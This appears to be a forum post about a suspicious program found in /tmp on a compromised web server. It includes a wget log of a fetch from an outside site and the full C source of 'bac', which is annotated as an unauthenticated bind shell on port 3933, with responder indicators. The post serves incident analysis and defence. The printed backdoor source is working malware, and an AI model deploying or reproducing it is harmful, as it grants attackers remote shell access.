bac.c exploit dropped in /tmp directory
Somebody I know just found some unusual .c files sitting in his /tmp directory as of this morning. It's an Ensim box. I'm wondering if this vuln has anything to do with the mod_ssl exploit that Cpanel claims is currently in 2.8.12. In /tmp we see two files.
bac.c and
bac <------ the compiled C program.
Some remote buffer overflow program!
Seems like it dials out on define PORT 3933
Then it connects to a site; however, this did not work very well. It probably tried to download some files from this site, but that didn't work. The box seems to be rootkit free at this time.
Some Russian site. Can't read a bloody word of it!
--07:49:59-- http://mworxnow.com/bac.txt
=> `/tmp//bac.txt'
Connecting to mworxnow.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,366 [text/plain]
0K . 100% @ 1.30 MB/s
07:50:00 (1.30 MB/s) - `/tmp//bac.txt' saved [1366/1366]
/tmp/bac.txt: file not recognized: File format not recognized
collect2: ld returned 1 exit status
gcc: No input files
/tmp/bac.c:50:1: warning: no newline at end of file
Could this be the new mod_ssl exploit that Cpanel recommends we upgrade from?
and..... APACHE IS DEAD IN THE WATER
After killing the bac process, Apache came to life.
Can any of you C gurus identify this program?
bac.c
#define PORT 3933
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* Analyst annotations on the recovered sample. All state is file-scope and
 * is only ever touched from main(); the globals just widen the scope.
 * soc_len is passed to accept() as int rather than socklen_t, and cli_pid
 * is assigned once and never read. */
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;   /* local address, filled in main(): INADDR_ANY on PORT */
struct sockaddr_in client_addr; /* peer address returned by accept(); never logged or checked */
/*
 * main() -- analyst annotations only; the code is byte-identical to the
 * sample recovered from /tmp and is documented here for identification,
 * not for building or running.
 *
 * What the listing does (and nothing else is present):
 *   1. opens a TCP socket and binds it to every local interface on PORT (3933);
 *   2. detaches from the invoking terminal (fork twice, new process group,
 *      SIGHUP ignored) so it outlives the session that started it;
 *   3. listens, and for each accepted connection wires the socket onto a
 *      process's stdin/stdout/stderr and execs /bin/sh.
 * There is no overflow payload, no authentication and no transport protection:
 * this is a plain unauthenticated bind shell, not a "remote buffer overflow
 * program". Anyone who can reach TCP/3933 gets a shell running as whatever
 * uid launched the binary (no privilege change is attempted in this code).
 *
 * Host indicators for a responder: a process listening on TCP/3933; /bin/sh
 * processes whose descriptors 0-2 are sockets; `bac` or its descendants as
 * the parent of such shells. Nothing in this file touches Apache, so the
 * reported web-server outage is not explained by this code alone.
 *
 * Portability notes (for reading, not fixing): exit(), bzero(), fork(),
 * setpgrp(), dup2(), execl() and close() are used without <stdlib.h>,
 * <strings.h> or <unistd.h> and are therefore implicitly declared; accept()
 * receives an int* where socklen_t* is expected.
 */
int main ()
{
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1); /* silent failure: no message, no log line */
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); /* all interfaces, not just loopback */
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1); /* e.g. port already in use: a second copy exits quietly */
/* Daemonise: the foreground process exits at once, so the launching shell
 * sees the command "finish" while the listener lives on in the background. */
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN); /* survive terminal hang-up */
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); /* blocks; peer address is discarded */
if (soc_cli < 0)
exit(0); /* any accept() error ends the whole listener */
cli_pid = getpid(); /* assigned, never used */
server_pid = fork();
/* fork() returns the child's pid to the parent, so this branch runs in the
 * listening process itself, which becomes the shell; the child (below)
 * inherits soc_des and carries on accepting. The roles are the reverse of the
 * usual pattern, but every connection still ends in a shell. */
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl("/bin/sh","sh",(char *)0); /* socket becomes the shell's stdin/stdout/stderr */
close(soc_cli); /* reached only if execl() failed */
exit(0);
}
close(soc_cli); /* child: drop the connected socket and loop back to accept() */
}
}